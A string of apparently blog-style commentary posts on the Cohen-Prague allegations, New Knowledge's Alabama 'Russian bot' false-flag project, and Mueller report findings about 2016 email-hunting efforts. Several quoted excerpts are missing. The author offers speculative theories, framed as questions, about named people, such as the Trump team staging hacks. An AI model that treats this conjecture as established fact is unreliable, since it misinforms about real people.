“A mobile phone traced to President Donald Trump’s former lawyer and “fixer” Michael Cohen briefly sent signals ricocheting off cell towers in the Prague area in late summer 2016, at the height of the presidential campaign, leaving an electronic record to support claims that Cohen met secretly there with Russian officials, four people with knowledge of the matter say.”
So this report is based on four anonymous sources “with knowledge of the matter”. And each of those four sources “obtained their information independently from foreign intelligence connections”:
And while we are given no information about which foreign intelligence agencies informed these sources about these allegations, we are told from two sources that the eavesdropping that picked up the conversations between Russian officials that mentioned Cohen being in Prague was Eastern European:
Might this be a Ukrainian intelligence agency that claims to have this eavesdropped conversation? That seems like a pretty big question that needs answering.
So all four of these anonymous sources back up the claim about the cell phone tower pinging, and two of them back up the claim about the eavesdropped Russian conversation which comes from an Eastern European intelligence agency. Might this Eastern European intelligence agency be the same source for the claims about the cell phone tower pinging? Might that also be Ukraine?
The cell phone evidence was only discovered after the fact, so it was presumably somehow stored in the logs of either the phone carrier Cohen used or from the cell phone manufacturer. And as the article notes, that kind of information is exactly the kind of information the Mueller probe would have likely already requested a long time ago. So if it turns out that this cell phone data is that kind of thing that Mueller’s team could have theoretically obtained, the fact that we’re only hearing about these allegations at this late point raises more questions about the accuracy of these allegations:
Then there’s a question of why there are no flight records for Cohen during that period. McClatchy had another report back in April of 2018, also based on anonymous sources, claiming that Mueller’s team already had evidence that Cohen specifically traveled from Germany to Prague during this time. As the article notes, US and European authorities should have a record if Cohen flew to Europe during this time. And yet flight records indicating Cohen flew into Germany during this time have yet to emerge and the sources for this report can’t give a set of specific dates when Cohen was supposedly in Prague:
So significant gaps remain in the evidence we are told investigators have.
Then there’s the fact that if Cohen did in fact make this trip, it would have been remarkably sloppy tradecraft to take your personal phone to a secret meeting. After all, based on what we are told, Cohen only very briefly had his phone on in Prague, suggesting an awareness that he needed to avoid having his phone tracked. simply carrying that phone with its battery installed could have allowed him to be tracked whether the phone is turned on or not. And yet the cell phone tower data was limited to a single short ping. So did Cohen have something to urgent on his phone that he decided to put his battery in his phone and do something with it while in Prague during his super secret meeting with the Russians?
And we can’t ignore the fact that the Steele dossier alleges that a purpose of this secret meeting was so Cohen and the Kremlin could plot ways to limit discovery of the close “liaison” between the Trump campaign and Russia. Of course, having a secret meeting in Prague involving Michael Cohen, Trump’s long-time ‘fixer’, and a series of Kremlin representatives is quite possibly one of the worst ways one could imagine to limit the discovery of that liaison. After all, the hacks of the Democrats were already very public and openly blamed on Russia by August/September of 2016. So the idea that Michael Cohen could make a secret trip to Prague to meet with Russians at that point and not be spotted by anyone would have been a wild risk for both the Trump team and the Kremlin to take even if Cohen didn’t take his personal phone with and turn it on while he was there:
Similarly, the Steele dossier also alleges that Konstantin Kosachev, a longtime member of the Russian Senate and chairman of the Federation Council’s Foreign Affairs Committee, “facilitated” the meeting in Prague and may even have been at the meeting. But as Mike Carpenter, a former Russia specialist at the Pentagon under President Barack Obama, puts it, the idea that someone as prominent as Kosachev would meet with Cohen for such a meeting seems unlikely – about “as discreet as sending (Secretary of State) Mike Pompeo to meet with an informant on a sensitive issue.”:
Then there’s the other absurd alleged goal of the meeting: ensuring that the European hackers who did the actual hack got paid and were told to “lie low” (because covertly paying off its hackers is apparently something the Kremlin wouldn’t already know how to do):
Just think about that idea: The Kremlin allegedly directed this team of hackers to hack the Democrats. But the Kremlin was also very concerned about getting caught and getting all sorts of negative news related to the hack. But despite all of these concerns and the highly sensitive nature of this operation, the question of how these hackers would be paid was something that came up in this secret meeting with Michael Cohen according to this scenario. That seems like an incredibly sloppy tradecraft.
And then there’s the fact that Mueller already indicted the GRU with the hackings and that indictment charges those GRU officers with the full spectrum of the hack, from the spearphishing operation, to the development and distribution of the malware, to the creation of the fake online personas and websites like dcleaks.com. So the idea that ‘European hackers’ carried out this hack and needed to be paid off and told to ‘lie low’ is something that doesn’t appear to align with Mueller’s own indictment:
So that’s the new allegation about Michael Cohen in Prague. Allegations of a brief cell phone tower ping based on four anonymous sources and an eavesdropped Russian conversion based on two of those sources. And if these allegations are true, it would appear to corroborate the Steele dossier’s remarkable claims that Cohen met with multiple Russians in Prague to discuss things like how to avoid having this secret liaison discovered and how to pay off the hackers.
But as the following article describes, when pressed about the nature of this sourcing, the reporters admit that they never saw the primary evidence that these allegations were based on. Instead, it’s based on the word of these four sources. And as part of the justification for why we should trust these sources, the reporters point out that they’ve used them many times in the past. And that means that if there’s a problem with the source this report, it’s a problem with the source for past reports too:
“McClatchy’s Greg Gordon, one of the journalists behind the explosive report on the president’s ex-lawyer Michael Cohen visiting Prague amid the 2016 election, admitted that he did not see first-hand some of the primary evidence used in the piece.”
Yep, this entire Cohen report is entirely based on the credibility of these four anonymous sources. But we are assured these are indeed credible sources because these reporters used these same sources for many different subjects. We’re also told they’ve been very accurate sources. But we aren’t told what those previously accurate stories have been based on these sources, so it’s still a matter of taking the word of these reporters that the word of their sources should be trusted:
Recall that one of the odd aspects of this most recent report is how there’s no information about specific dates. Like the date of the cell phone tower ping, the dates of the clandestine meeting, or the date of the eavesdropped conversation. So the fact that these four sources not only couldn’t provide physical evidence of their claims but couldn’t even provide dates suggests that the sources probably haven’t seen any physical documents either. In other words, it’s quite possible that this story is pretty much hearsay. Assuming it’s not pure disinformation.
And since this story is being used to buttress the claims that this Prague meeting actually took place, and Cohen and the Russians really did have a secret meeting where they discussed how to keep the Trump/Kremlin collusion a secret and minimize the blowback and also discussed how to pay off the hackers, it’s worth noting that the Steele dossier actually alleged that at least some of the hackers were at the meeting. That fun fact was tucked away in the April 2018 report by the same McClatchy reporters as the above report. This was the report where they first claim that investigators had indeed come across evidence that Cohen visited Prague, arriving there from Germany. This report was also attributed to anonymous sources, which raises the question of whether or not its the same sources as in the above recent report. So literally inviting hackers to the secret meeting with Cohen and the Russians was apparently on the agenda at the meeting where they were trying to avoid exposure of the Trump/Kremlin collusion and blowback. It’s not the most impressive tradecraft:
“But investigators have traced evidence that Cohen entered the Czech Republic through Germany, apparently during August or early September of 2016 as the ex-spy reported, said the sources, who spoke on condition of anonymity because the investigation is confidential. He wouldn’t have needed a passport for such a trip, because both countries are in the so-called Schengen Area in which 26 nations operate with open borders. The disclosure still left a puzzle: The sources did not say whether Cohen took a commercial flight or private jet to Europe, and gave no explanation as to why no record of such a trip has surfaced.”
So, back in April of 2018, this same team of McClatchy reporters wrote an article based on anonymous sources that investigators had indeed determined that Cohen really did go to Prague through Germany. Might these anonymous sources by the same anonymous sources behind the recent Cohen revelation? It sure seems likely. But note that these sources appear to be given updates on the inner workings of the Mueller investigation (assuming “investigators” refers to Mueller’s team), so that gives us an idea of whether or not these anonymous sources are US-based or not.
And as the article noted at the time, the Steele dossier doesn’t just allege that Cohen met with Russians in Prague. There were several Eastern European hackers there, including Romanians. Recall how the persona of ‘Guccifer 2.0’ was initially supposed to be a lone Romanian hacker but that persona didn’t speak like a native Romanian speaker, using perfect English at times. Also recall that Mueller’s indictment of the GRU for the hack included charges that a GRU team was behind the creation and execution of the Guccifer 2.0 persona. So if the Kremlin was super concerned about getting caught being behind these hacks, as the Steele dossier alleges, the fact that GRU was apparently unable to impersonate a native Romanian speaker is another example of remarkably shoddy tradecraft, especially if there was literally a Romanian hacker working on this operation. After all, it’s not like this alleged Romanian hacker needed to be kept out of the loop about this being a Kremlin operation colluding with Trump since the hacker was apparently at the Prague meeting:
And then the article reminds us that the Steele dossier actually alleges that Russian diplomat Mikhail Kalugin played a role in coordinating the cyber offensive. Note that Kalugin’s name doesn’t appear in Mueller’s indictment of the GRU. So that would be another area where the Mueller GRU indictment doesn’t appear to be aligning with the accusations in the Steele dossier:
Finally, let’s take a quick look at that February 2017 McCatchy report about the allegations against Kalugin and the role he played in the alleged Kremlin cyber operation. As we’re going to see, two of the reporters for the article are the same two reporters for the above two McClatchy articles, Peter Stone and Greg Gordon. The report also relies entirely on anonymous sources. Might these be the very same anonymous sources for the above reports? Don’t forget what Greg Gordon told us in the second article: that these anonymous sources have been the sources for many previous reports. Does that include the following report?
The article also notes that the Steele dossier charges Kalugin with coordinating the payoff of the hackers. According to a Steele report on September 16, 2016, tens of thousands of dollars were getting sent the hackers and other operatives using the Russian pension system for Russians living in the US. So that would suggest the hackers, at least some of them, were Russians living in America.
Also recall that the reporters defended their sources by arguing that they’ve been accurate in the past. And in this case it’s very possible these anonymous sources were accurate since they simply allege that investigators were looking into whatever role Kalugin may have possibly played in the hack. Also note that, again, if it turns out these are the same anonymous sources that McClatchy used in the recent report on Michael Cohen and Prague, it would suggest that these anonymous sources are indeed quite close to the Mueller investigation or at least aware of its inner workings:
“Two people with knowledge of a multi-agency investigation into the Kremlin’s meddling have told McClatchy that Mikhail Kalugin was under scrutiny when he departed. He has been an important figure in the inquiry into how Russia bankrolled the email hacking of top Democrats and took other measures to defeat Hillary Clinton and help Donald Trump capture the White House, said the sources, who spoke on the condition of anonymity because of the sensitivity of the investigation.”
In February of 2017, a team of McClatchy reporters, including Peter Stone and Greg Gordon, has two anonymous sources that reveal the that Mueller team was looking into the role Mikhail Kalugin may have played in paying off the hackers. And as we saw above, in April of 2018, Stone and Gordon have another report citing anonymous sources assuring us that Mueller has seen evidence that Cohen traveled to Prague from Germany, seemingly backing up the Steele dossier. And then, just days ago, we get a new report by Stone and Gordon about how there’s been cell phone tower evidence and eavesdropped confirmations further backing up the Prague meeting also based on anonymous sources. And we are told by Gordon that the anonymous sources for this most recent report have been used for multiple stories in the past.
So while we don’t know if the anonymous sources for this February 2017 report are the same ones used in the April 2018 and December 2018 reports about the Prague trip, it sure seems like a good bet. And if that’s the case, it would appear that these anonymous sources have an interest in getting stories published that appear to back up the various allegations made in the Steele dossier that would back up the idea that the Kremlin was directly coordinating with the Trump campaign over the hackings. Allegations that include the allegation that Kalugin was moving tens of thousands of dollars to the hackers using the Russian government system for paying the pensions of Russian military veterans living in the US:
And note that this Steele report is from September 14, 2016, which is presumably shortly after when the Prague meeting allegedly took place in late August/early September 2016. If this report by Steele was accurate that would suggest Steele’s contacts in the Kremlin were very up to date on the workings of this cyber operation at the time.
So we have anonymous sources who are basically trying to convince the American public that the Steele dossier sourcing is correct regarding the Prague meeting and the various Kremlin efforts to coordinate the cyber operation. They haven’t actually shown the McClatchy reporters evidence of this, but we are supposed to take them at their word. And if that’s the case, we are supposed to believe that Michael Cohen secretly traveled to Prague in the middle of the 2016 campaign to secretly meeting with some Kremlin representatives and some of the non-Russian hackers where they could all coordinate on how to minimize the chances of getting caught and also coordinate how to pay off the hackers without getting caught. And one of the methods for paying off the hackers involved a Russian diplomat working in DC using the Russian pension system for Russian military veterans living in the US. Also, Michael Cohen brought his personal cell phone to this secret Prague meeting and somehow made a highly ill-advised ping of a cell phone tower and Russian officials were discussing this meeting on a phone that was wiretapped. It’s all a reminder that, if it turns out that the Steele dossier really is largely true and there was actually a massive Kremlin cyber operation that the Kremlin didn’t want to be discovered, this whole thing has got to be some sort of world record of shoddy tradecraft.
And if it, instead, turns out that these anonymous sources are running a disinformation campaign that also points towards some problematic tradecraft.
The Washington Post got its hands on a document giving new details on the false flag ‘Russian bot’ operation that was being run in the 2017 Alabama special Senate race. That’s the psyop that was being run by New Knowledge, the cybersecurity firm that recently, and ironically, co-authored the Senate Intelligence Committee’s report on Russian disinformation operations. We know have an internal name for that psyop: Project Birmingham.
The new document appears to be a general summary of the results of Project Birmingham. It sounds like Project Birmingham was funded with $750,000 from Reid Hoffman and run by a American Engagement Technologies (AET), a technology start-up founded by Mikey Dickerson, a former Obama administration officials. Dickerson’s claim to fame includes fixing the buggy Obamacare website that led to the public relations nightmare for the Affordable Care Act. So while Dickerson may have helped fixed a public relations nightmare in that case, he appears to have led the creation of a new public relations nightmare with Project Birmingham.
Hoffman’s relationship with AET was reportedly brokered by his political adviser, Dmitri Mehlorn. Mehlorn heads a group called Investing in US that helps direct Silicon Valley money into left-leaning political causes. So this whole thing appears to be primarily a creation of Silicon Valley millionaires and billionaires.
Both Dickerson and Hoffman claim to have had no knowledge of these kinds of ‘Russian bot’ false flag tactics at the time. Dickerson is also disassociating himself from the internal report, suggesting that it was created by New Knowledge. New Knowledge’s Johnathon Morgan, on the other hand, claims his form had nothing to do with the document and downplays the scale of the New Knowledge project as merely a small experiment. Importantly, Morgan goes on to speculate that the Project Birmingham document was actually a summary of New Knowledge’s work and the work of other similar projects run by other groups under the Project Birmingham umbrella.
And based on the money involved, it does appear to be the case that more projects were going on, because only $100,000 was reportedly spent on New Knowledge’s work but $750,000 went to the entire project. So it sounds like there are a bunch of other similar operations managed by AET yet to be discovered:
“As the scandal has expanded, with calls for federal and state investigations and Facebook also conducting a review, the tactics described in the Project Birmingham document have come under intense scrutiny. Those included a “false flag” effort that generated phony evidence that automated Russian accounts called bots had supported Moore on Twitter and the creation of a misleading Facebook page, aimed at Alabama conservatives, that sought to undermine Moore by encouraging them to vote for a rival Republican through a write-in campaign.”
So at least some of the documents behind this false flag effort are available to journalists. In this case, the 12 page document is from three days after the December 15, 2017, Alabama vote and was presented to a group of 13 technology experts last September. And while New Knowledge’s name was redacted out of the document, Dickerson did eventually admit to reporters that the redacted name of the company behind the report was indeed New Knowledge:
And note how some of the fake Russian bot twitter accounts had things like Cyrillic in the profile information, leading to some reporters to question whether or not they were actually Russian at the time. Keep in mind that New Knowledge helped write the Senate Intelligence Committee’s report on Russian disinformation. So if the fake accounts that New Knowledge was trying to pass off as Russian included blatant ‘clues’ like Cyrillic, that gives us an idea of the kind of standards New Knowledge was likely using for identifying true ‘Russian bot’ accounts for the Senate report:
Not surprisingly, everyone involved with this report is denying awareness of Project Birmingham when it was happening. Hoffman gave $750,000 to Mikey Dickerson’s American Engagement Technologies (AET). Dickerson claims it came from New Knowledge and that he had only learned about the false flag tactics in early 2018:
Hoffman, who was funneling his money into AET through his political adviser, Dmitri Mehlorn’s Investing in US, is also claiming to have had no knowledge of this operation (that he paid $750,000 for). Mehlorn also claims ignorance of the key details of the project:
Renee DiResta, who went to work for New Knowledge and who was the lead author of the Senate Intelligence Committee report on Russian disinformation, is claiming that she knew nothing of tactics New Knowledge was using:
And New Knowledge’s Jonathon Morgan publicly denied writing the Project Birmingham report and speculated that Project Birmingham is actually the name from an umbrella project that included New Knowledge’s work but also the work of other groups:
And given that only $100,000 of the $750,000 Hoffman gave to the project was spent by New Knowledge, Morgan’s speculation seems pretty reasonable. Especially after the following report about a new disinformation operation in the 2017 Alabama Senate race. And while this new one doesn’t appear to involve fake ‘Russian bot’ false flag operations, it does appear to be related to Project Birmingham: This time it was a psyop designed to look like a group of pro-alcohol prohibition Baptist teetotalers, “Dry Alabama”, running a “Pray for Roy Moore” Twitter and Facebook campaign. The idea was that if a group like that openly supported Moore this would hurt his broader support. Both the New Knowledge project and this new project received each received $100,000, funneled through the same organization: Investing in Us, run by Reid Hoffman’s political advisor Dmitri Mehlorn to funnel Silicon Valley money into politics:
“Political social media trickery of this sort is usually well hidden and hard to detect without help from an insider, so it’s difficult to say how common it has become. Some political veterans warn that without new laws or regulations explicitly outlawing fraudulent social media tactics, both parties may feel pressure to use them simply to stay competitive.”
Yep, it’s difficult to say how common social media trickery has become. Especially since the groups like New Knowledge that are getting tasked to study social media trickery are running their own disinformation operations and have deep conflicts of interest. It’s a reminder that we really have no idea who is behind the wave ‘Russian troll’ activity. How much of it is the Republican party or independent right-wing operations? How much is funded by dark money? How about other nations? Or far right groups around the world wanting to influence US elections? We simply have no idea.
And both “Dry Alabama” and New Knowledge received $100,000 from the same group: Investing in US, the outfit run by Dmitri Mehlorn:
And there’s at least two other social media false flag operations that appear to be part of this effort run by Tovo Labs and Dialectica. Tovo Lab set up websites targeting Christian conservatives. We don’t know what Dialectica did, but they offer “a new generation of information weapons”:
So based on this discovery, it would appear that Jonathon Morgan of New Knowledge was probably correct when he suggested that the Project Birmingham report covers the work of other groups in addition to New Knowledge. We know about four so far. How many more go? We’ll see. Or maybe we won’t. That’s how social media trickery works: you know that you don’t know how much of it is out there and will likely never know. But at least now we know that when you see things like Cyrillic characters left in the profiles ‘Russian bot’ twitter accounts, those probably aren’t actually Russian bots. Which we should have already known.
Following up on the story of New Knowledge, the cybersecurity firm that created fake “Russian bots” during the 2017 Alabama special election and also wrote the Senate Intelligence Committee’s report on the Kremlin’s cyber actions during the 2016 election, here’s a story about new analysis that arrives at the conclusion that the Kremlin is already backing Tulsi Gabbard’s 2020 presidential campaign that answers the question of whether or not getting caught running a false flag Russian bot campaign would harm New Knowledge’s credibility in this area: Nope, it will be as if we have no knowledge of what New Knowledge did:
“An NBC News analysis of the main English-language news sites employed by Russia in its 2016 election meddling shows Rep. Tulsi Gabbard of Hawaii, who is set to make her formal announcement Saturday, has become a favorite of the sites Moscow used when it interfered in 2016.”
Russian English-language sites like RT or Sputnik give Gabbard pretty positive coverage, something completely to be expected given her foreign policy positions, and that apparently qualifies as the sign of a looming Russian disinformation operation.
And while the coverage of Kremlin-controlled outlets is indeed a legitimate topic to be studied, this analysis isn’t limited to known Kremlin-controlled entities. According to New Knowledge, we should also treat chatter on troll sites like 8chan as signs of Kremlin influence. New Knowledge’s director of research, Renee DiResta — who, we’ll recall, was also the lead author of the Senate Intelligence Committee report — informs us that “A few of our analysts saw some chatter on 8chan saying she was a good ‘divider’ candidate to amplify”. And that 8chan chatter appears to qualify as evidence of a Kremlin activity and intent. New Knowledge also found that that three of the top 15 URLs shared by the 800 social media accounts affiliated with known and “suspected Russian propaganda operations” directed at U.S. citizens were about Gabbard:
And recall how it was 4chan — the sister troll site of 8chan — where someone posted that the hacked emails of Emmanuel Macron were about to be leaked two days before those emails went public. This was the hack that was conclusively blamed on Russia by the US government even though the head of French cybersecurity said it could have been anyone any the NSA refused to provide evidence it was Russia. Evidence subsequently pointed towards neo-Nazi hacker Andrew Auernheimer being behind the website that actually leaked of the hacked documents. It’s all a reminder that pretending to be Kremlin trolls is exactly the kind of thing the Alt Right trolls at 8chan would LOVE to do, for the LULz if nothing else.
So might the chatter on 8chan or the other “suspected Russian propaganda operations” that the New Knowledge analysts observed actually have been Alt Right trolls pretending to be Kremlin trolls? Or was it New Knowlege’s analysts who simply assumed that the 8chan trolls must be Kremlin trolls without those trolls even trying to pretend to be Kremlin trolls? Or are the 8chan trolls just another New Knowlege false flag operation? We have no idea at this point. But we do have a pretty good idea as to whether or not New Knowledge might just completely make up fake accounts and then publicly declare them to be ‘Russian bots’.
It’s arrived! Somewhat. The Mueller report is out, albeit in redacted form. There’s no shortage of interesting findings in the report and one of the most intriguing findings has to do with the interactions between the Trump campaign and the hacked email hunting operation run by Peter Smith and the parallel email hunting operation run by Barbara Ledeen.
It has long been clear that Michael Flynn was in contact with the Smith and Ledeen operations but one of the unanswered questions swirling around these stories was whether or not Trump himself was involved or even knew about them. And the company created by Smith for this endeavor included multiple Trump campaign associates. In documents created by Smith describing the effort (which he used to attempt to recruit experts to work on it), Steve Bannon, Kellyanne Conway, and Sam Clovis were all listed by Smith as being part of it, in addition to Flynn. But what about Trump?
And now we’re learning in the Mueller report that, yes, Trump was actively encouraging these efforts. According to the report, Michael Flynn told Mueller’s team that Trump repeatedly asked Flynn during the campaign to find Hillary Clinton’s emails. It was assumed that her private server had already been hacked years earlier and that they might be available for sale on the Dark Web. Flynn, in turn, “contacted multiple people in an effort to obtain the emails,” including Peter Smith and Barbara Ledeen, according to the report.
Note that this wording suggests that Flynn may have contacted other individuals or groups too. Recall how Smith had recounted his conversations with Charles Johnson about finding the emails and Johnson told Smith he would inform a “hidden oppo network” of right-leaning opposition researchers that were also hunting for the emails about Smith’s efforts. Johnson also referred Smith to Andrew “weev” Auernheimer for more expert hacking advice. So we know that there were more efforts than just the Smith and Ledeen operations to find Hillary’s hacked emails. Was Flynn and the Trump team in contact with those other groups? That remains unclear.
And there was another person previously unknown to be involved in this effort: Erik Prince. In August of 2016, Smith informed the Trump campaign of his efforts. Later, although we don’t know when exactly, Barbara Ledeen told Smith she thinks she came across a trove of emails that might be Hillary’s. Smith wanted them authenticated and it was Erik Prince reportedly provided the funds to hire an expert to validate whether or the emails were real. The expert concluded they were not real. Recall that it was also in early August of 2016 that Prince and George Nader made a secret trip to Trump Tower with the CEO of Psy Group to inform Trump that the crown princes of the UAE and Saudi Arabia wanted to help him win and had a social media manipulation campaign all ready to go. Also recall how the services Psy Group offered clients included obtaining hacked materials and political dirty tricks. So in August of 2016 Prince was pitching the services of a company with hacking expertise on behalf of the UAE and Saudi Arabia, and at some point after that he’s also financing an expert to look over emails Peter Smith acquired on the Dark Web. So it would appear that Erik Prince was also part of the GOP’s covert email-hunting effort:
“President Trump pushed for obtaining Democratic rival Hillary Clinton’s private emails, and his campaign was in touch with allies who were pursuing them, according to the redacted special counsel’s report released Thursday.”
It’s a pretty big revelation. Except it’s not entirely a revelation since he publicly pushed for Russia to obtain those emails. But that was always brushed off as a joke. Learning that Flynn claimed that Trump “made this request repeatedly” to Flynn during the campaign is indeed new. And note how the report indicates that Flynn reached out to more people than just Smith and Ledeen in this effort:
Then, in August, Smith writes to Sam Clovis to let the Trump team know about his work. At some point after that, Barbara Ledeen tells Smith she thinks she might have Hillary’s hacked emails and it’s none of than Erik Prince who pays for an expert to authenticate them:
Might that tech adviser hired by Prince have been associated with Psy Group? At this point we don’t know but that would be a remarkable twist. Either way, the fact that Prince was directly involved in multiple Saudi/UAE efforts during this period (don’t forget the entire ‘Seychelles backchannel’ episode that also appeared to be a UAE-driven enterprise immediately after the election) and he was also involved with the Trump team’s hacking-related activities raises a whole lot of new questions.
And that’s perhaps one of the key takeaways from the release of the Mueller report regarding the Trump campaigns hacking efforts: The report ended up raising a whole lot of new hacking-related questions. Questions that will presumably remain unanswered.
Ever since President Trump told Lester Holt in a televised interview that he was thinking of “this Russia thing” when he fired former FBI director James Comey, the question of whether or not President Trump should get impeached for obstruction of justice alone has been one of the biggest questions looming over his presidency. After all, once Trump started publicly engaging in what appears to be blatant obstruction of justice, the question of whether or not he colluded with Russia becomes somewhat moot when it comes to whether or not he should be impeached.
Flash forward to today, and we’re finding that there’s literally an entire section of Mueller report dedicated to Trump’s obstruction of justice and it makes a compelling case. It turns out that a president that admits to obstructing justice in publicly might also be trying like hell to obstruct justice in private. Go figure.
Since obstruction of justice is arguably one of the worst crimes a president can commit because it’s such a direct attack on the legal principle that no one is above the law, the question of whether or not the country can afford to not impeach Trump and leave that kind of precedent is now going to be one of the central questions heading into the 2020 election cycle. At the same time, there’s no indication at all that Trump’s supporters are moved by these obstruction of justice charges and any attempts to impeach Trump will inevitably become a hyper-partisan affair with repercussions that are difficult to predict.
So the documented extensive obstruction of justice as recounted by Trump’s staff in the Mueller report and in Trump’s own public statements really does represent a kind of existential crisis for the US: Trump really did repeatedly cross lines that presidents should never cross because it’s so dangerous to the rule of law but that doesn’t change the fact that the US is politically broken in all sorts of other ways that make impeachment a particularly perilous endeavor. It’s guaranteed there’s going to be a complete far right melt down and no guarantee that the melt down won’t end up damaging the country even more. Impeachment is both compelling and perilous.
And that’s all why it’s going to be critical for those backing impeachment to recognize that when it comes to the other half of the Mueller report — the half detailing the allegations surrounding the Russian ‘active measures’ in the US campaign and hacks of the Democrats — the evidence laid out in the report was basically a summary of the same evidence we saw in the Mueller team’s previous indictments. And as we’ve seen over and over, that evidence was far from compelling.
What has changed with the issuing of the report, however, is a strengthening of the circumstantial evidence pointing towards the Trump team having a role in the hacks. And that’s part of what makes potential impeachment proceedings against Trump so fascinating: one of the obvious potential defenses the Trump team could have against Russian collusion is to point out how weak the actual evidence that the Kremlin really did carryout out a vast social media manipulation campaign and really was behind the ‘Fancy Bear’ hacks against the Democrats. But that defense simultaneously invites speculation about who else may have been involved in those hacks and growing amounts of evidence point back towards the Trump team and its affiliates. So while the issuing of the Mueller report might have a ‘case closed’ feel to it, the fact that the report invites impeachment and impeachment, in turn, invites a thorough reexamination of the evidence underlying the report suggests we could actually be looking at a ‘case reopening’ period for #TrumpRussia and that could get really awkward for Trump in entirely new ways.
One of the defining features of the RussiaGate scandal has been the fact that the evidence of what the Kremlin did has always been highly dubious. The Russian social media manipulation campaign as described by Mueller’s investigators appears to be an insignificant joke in the scheme of things. And the hacks, while undeniably impactful, look like some sort of false flag set up by a third party unless the Kremlin was trying to frame itself, with the indictment against the GRU citing almost no evidence and the evidence it did cite was highly ambiguous. None of those problems with the evidence changed with the final report.
But the report did inform us that Michael Flynn told Mueller’s team that Trump repeatedly made requests to associates to find Hillary Clinton’s deleted emails. We’ve also learned that Erik Prince — who offered the services of Psy Group to the Trump campaign on behalf of Saudi Arabia and the UAE — paid for a technical expert who worked with Peter Smith’s and Barbara Ledeen’s email-hunting teams. So Trump himself was actively pushing for the recovery of Hillary’s deleted emails and there were multiple teams we know about with the motive and the means to not just scour the Dark Web for hackers who they assumed might have Hillary’s emails but also carry out hacking attempts of their own. Both Psy Group and Cambridge Analytica would have likely had the technical ability to carry out hacking attempts themselves that are made to look like ‘Russian’ hacks.
Here’s a key example of how the circumstantial evidence increasingly suggests that the Trump team or its associates could have been involved in the hacks and hacking attempts: Also highlighted in the report as evidence of apparent Trump campaign collusion with Russia is the fact that there was a hacking attempt against Hillary Clinton’s personal office just 5 hours after Trump made his infamous public plea during a campaign event on July 27, 2016, for Russia to find Hillary’s deleted emails from her private server. And this was the first known attack against that server that investigators could detect. This coincidence is portrayed as compelling circumstantial evidence of how the Kremlin and the Trump team were effectively working in a coordinated manner whether or not there was an explicit agreement of collusion.
But there are a number of different way to interpret that coincidence of Trump’s call for a Russia hack followed by the first attempt on Hillary’s private office. For example, now that we know Trump started asking his own teams to find Hillary’s deleted emails — which is an implicit request to potentially hack something like Hillary’s personal office in the hopes of finding them there — why is there no speculation that Trump’s public call for Russia to do the hacking wasn’t rhetorical cover for his own hacking teams?
Keep in mind that July 27, 2016, was days after Wikileaks made its first public dump of hacked Democrat emails and documents on July 22, so it was only at that point that the Trump campaign would have been aware that the deleted emails from Hillary Clinton’s private server were not likely in the anticipated trove Wikileaks had for releasing.
And there’s another new fun facts in the Mueller report about Barbara Ledeen’s email-hunting team: When Ledeen wrote a proposal to Peter Smith in December 2015 for the email hunting project, Ledeen was convinced that specifically finding evidence that Hillary’s private email server had been hacked was seen as crucial for the election. The hacking of the DNC and DCCC may have been embarrassing. But the Republicans had been spending years making the case that Hillary’s private email server was a unique national security risk because it could be hacked.
In addition, Ledeen’s proposal to Smith includes a plan to check with certain intelligence sources “that have access through liaison work with various foreign services” to determine if any of those services had gotten to the server. So the Ledeen team apparently had a foreign intelligence tie of some sort. From pages 62–63 in the Mueller Report...:
So Ledeen’s email hunting team had some sort of foreign intelligence tie connection and was determined to specifically find emails from Hillary’s private server. Then, five days after the Wikileaks dump that didn’t include any emails from her server, we have Trump make a public call for Russia to find the deleted emails form the server and multiple private calls for the multiple email-hunting teams already working with the Trump campaign to find the emails. Doesn’t that all make the Trump team a prime suspect for that hacking attempt against Hillary’s private office just hours after Trump’s public call? Might Trump have intentionally made that made public shout out to Russia as intentional cover for a planned hacking attempt by his team? Now that we know Trump was actively involved in pushing for obtaining those deleted emails right at this time, the possibility that he was consciously putting out the call to Russia as cover for his own teams start looking like a much more plausible scenario.
That’s an example of the the kind of evidentiary mines laying in wait for the US if there’s a big reexamination of the evidence behind this report during any upcoming impeachment hearings. And keep in mind that if it is the case that the Trump team was indeed involved with the hacking attempts and covered that up that should also count as obstruction of justice.
There was a notable update on the official story of how the US government arrived at the conclusion that Vladimir Putin personally ordered the hacking of the Democratic National Committee in 2016. First, recall the reports from June of 2017 about how it was a source deep inside the Kremlin that was the basis for the conclusion that Putin personally ordered a hacking campaign intended to harm Hillary Clinton and help Donald Trump. Well, we’re now learning that this deep Kremlin source has since been exfiltrated from Russia and is living somewhere in the DC area now.
We’re told that this source wasn’t a direct part of Putin’s inner circle but saw him regularly and had access to high-level Kremlin decision-making. The source was recruited decades ago while they were a midlevel Russian official. The source rose through the ranks and eventually landed a position that gave them access to the highest levels of the Kremlin.
Interestingly, the exfiltration processes reportedly led to some concerns about the trustworthiness of this source. The CIA initially suggested removing this source from Russia in late 2016 over concerns about their safety. But the source initially rejected the exfiltration offer, citing family concerns. It was this rejection that created concerns within the CIA about the trustworthiness of this source and fears that the source was a double agent. It was the news coverage about the #TrumpRussia scandal in the spring and summer of 2017 that convinced CIA officials to once again offer to exfiltrate this source. This time the source agreed, helping to put to rest some of the fears about their trustworthiness. We’re told that some CIA officials had other reasons to fear the source was a double agent but we aren’t given details about the nature of those fears. So overall, it sounds like this source became a crucial linchpin for the CIA’s assessment about DNC hack around the same time there were concerns about the sources trustworthiness. Concerns that were put aside once the source eventually agreed to be exfiltrated at some point after the summer of 2017: